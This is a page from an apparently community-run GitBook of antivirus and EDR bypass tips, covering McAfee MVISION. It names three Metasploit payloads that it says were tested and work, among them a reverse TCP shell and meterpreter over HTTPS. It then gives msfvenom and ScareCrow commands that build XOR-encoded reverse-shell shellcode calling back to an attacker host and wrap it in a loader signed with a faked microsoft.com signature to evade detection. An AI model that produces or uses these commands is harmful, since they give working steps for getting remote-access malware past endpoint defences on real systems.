🛡️
Awesome AV/EDR/XDR Bypass Tips
  • 「🛡️」Awesome AVs/EDRs/XDRs Bypass Tips
    • BitDefender
    • McAfee MVISION
    • Sophos
    • Windows Defender
Powered by GitBook
On this page
  1. 「🛡️」Awesome AVs/EDRs/XDRs Bypass Tips

McAfee MVISION

PreviousBitDefenderNextSophos

Last updated 2 years ago

Bypassing using ScareCrow

You can use the tool to bypass McAfee EDR. We tested 3 types of metasploit payloads that work, they are:

  • windows/x64/shell/reverse_tcp

  • windows/x64/meterpreter_reverse_https

  • windows/x64/exec

Commands:

$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -a x64 -e x64/xor > shellcode.bin 
$ ./ScareCrow_4.11_linux_amd64 -I shellcode.bin -domain microsoft.com

It obscures itself to circumvent protections and also contains a false signature to give more credibility to the target.

scarecrow